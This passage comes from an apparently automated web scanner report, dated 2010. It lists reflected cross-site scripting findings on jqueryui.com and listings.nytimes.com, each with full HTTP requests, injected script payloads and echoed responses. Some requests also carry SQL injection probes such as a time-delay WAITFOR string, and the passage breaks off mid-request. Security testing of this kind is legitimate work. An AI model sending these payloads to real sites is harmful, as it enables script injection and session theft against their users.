...[SNIP]...

4.178. http://jqueryui.com/themeroller/ [opacityShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the opacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a79c3"><script>alert(1)</script>0133da4d252 was submitted in the opacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20a79c3"><script>alert(1)</script>0133da4d252&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:25 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ror=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20a79c3"><script>alert(1)</script>0133da4d252&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px" type="text/css" media="all" />
...[SNIP]...

4.179. http://jqueryui.com/themeroller/ [thicknessShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the thicknessShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5231d"><script>alert(1)</script>6c1b949ca33 was submitted in the thicknessShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px5231d"><script>alert(1)</script>6c1b949ca33&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:26 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
erlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px5231d"><script>alert(1)</script>6c1b949ca33&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px" type="text/css" media="all" />
...[SNIP]...

4.180. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [AdTagCountyId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the AdTagCountyId request parameter is copied into the HTML document as plain text between tags. The payload e67b1<script>alert(1)</script>cfb38d751f7a43364 was submitted in the AdTagCountyId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?ChangeEmail=%27;WAITFOR%20DELAY%20%270:0:25%27--&KeyWord=--+Keyword+--&RegionId=3&SubCatId=3&AdTagCountyId=3e67b1<script>alert(1)</script>cfb38d751f7a43364&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strStates=3&SubCatId=3&UserEmail=netsparker%40example.com&UserPwd=3 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp?ChangeEmail=&KeyWord=--+Keyword+--&RegionId=&SubCatId=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:31:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 552
Content-Type: text/html
Cache-control: private

<h1>Form</h1><h1>QueryString</h1>ChangeEmail=%27;WAITFOR%20DELAY%20%270:0:25%27--&KeyWord=--+Keyword+--&RegionId=3&SubCatId=3&AdTagCountyId=3e67b1<script>alert(1)</script>cfb38d751f7a43364&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c
...[SNIP]...

4.181. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [AdTagCountyId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the AdTagCountyId request parameter is copied into the HTML document as plain text between tags. The payload 5ef5f<script>alert(1)</script>891192eefff was submitted in the AdTagCountyId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 391

AdTagCountyId=1 AND 'NS='ss5ef5f<script>alert(1)</script>891192eefff&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 465
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=1 AND 'NS='ss5ef5f<script>alert(1)</script>891192eefff&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c
...[SNIP]...

4.182. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [AdTagPriceIndx parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the AdTagPriceIndx request parameter is copied into the HTML document as plain text between tags. The payload bed0b<script>alert(1)</script>88d4418c010 was submitted in the AdTagPriceIndx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 391

AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3bed0b<script>alert(1)</script>88d4418c010&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 465
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3bed0b<script>alert(1)</script>88d4418c010&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-
...[SNIP]...

4.183. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [AdTagPriceIndx parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the AdTagPriceIndx request parameter is copied into the HTML document as plain text between tags. The payload d0174<script>alert(1)</script>5d9aae33f2e8c9585 was submitted in the AdTagPriceIndx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?ChangeEmail=%27;WAITFOR%20DELAY%20%270:0:25%27--&KeyWord=--+Keyword+--&RegionId=3&SubCatId=3&AdTagCountyId=3&AdTagPriceIndx=3d0174<script>alert(1)</script>5d9aae33f2e8c9585&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strStates=3&SubCatId=3&UserEmail=netsparker%40example.com&UserPwd=3 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp?ChangeEmail=&KeyWord=--+Keyword+--&RegionId=&SubCatId=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:31:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 552
Content-Type: text/html
Set-Cookie: ASPSESSIONIDACATSTCS=KFKJLAHAPGBLLLHFLPCBHNEP; path=/
Cache-control: private

<h1>Form</h1><h1>QueryString</h1>ChangeEmail=%27;WAITFOR%20DELAY%20%270:0:25%27--&KeyWord=--+Keyword+--&RegionId=3&SubCatId=3&AdTagCountyId=3&AdTagPriceIndx=3d0174<script>alert(1)</script>5d9aae33f2e8c9585&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-
...[SNIP]...

4.184. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [Amenities parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the Amenities request parameter is copied into the HTML document as plain text between tags. The payload 6b529<script>alert(1)</script>2d5124fe105042a4 was submitted in the Amenities parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?ChangeEmail=%27;WAITFOR%20DELAY%20%270:0:25%27--&KeyWord=--+Keyword+--&RegionId=3&SubCatId=3&AdTagCountyId=3&AdTagPriceIndx=3&Amenities=36b529<script>alert(1)</script>2d5124fe105042a4&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strStates=3&SubCatId=3&UserEmail=netsparker%40example.com&UserPwd=3 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp?ChangeEmail=&KeyWord=--+Keyword+--&RegionId=&SubCatId=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:32:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 551
Content-Type: text/html
Set-Cookie: ASPSESSIONIDACATSTCS=OIKJLAHAKALONFALIMIHHCBG; path=/
Cache-control: private

<h1>Form</h1><h1>QueryString</h1>ChangeEmail=%27;WAITFOR%20DELAY%20%270:0:25%27--&KeyWord=--+Keyword+--&RegionId=3&SubCatId=3&AdTagCountyId=3&AdTagPriceIndx=3&Amenities=36b529<script>alert(1)</script>2d5124fe105042a4&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c8
...[SNIP]...

4.185. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [Amenities parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the Amenities request parameter is copied into the HTML document as plain text between tags. The payload af9ff<script>alert(1)</script>55718c59716 was submitted in the Amenities parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 391

AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3&Amenities=3af9ff<script>alert(1)</script>55718c59716&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 465
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3&Amenities=3af9ff<script>alert(1)</script>55718c59716&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c8
...[SNIP]...

4.186. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [CategoryId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the CategoryId request parameter is copied into the HTML document as plain text between tags. The payload 4860b<script>alert(1)</script>626b282daaf was submitted in the CategoryId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 391

AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR4860b<script>alert(1)</script>626b282daaf&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 465
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR4860b<script>alert(1)</script>626b282daaf&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1
...[SNIP]...

4.187. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [CategoryId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the CategoryId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17a59"><script>alert(1)</script>e4b9c9d10edc54c92 was submitted in the CategoryId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR17a59"><script>alert(1)</script>e4b9c9d10edc54c92&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c1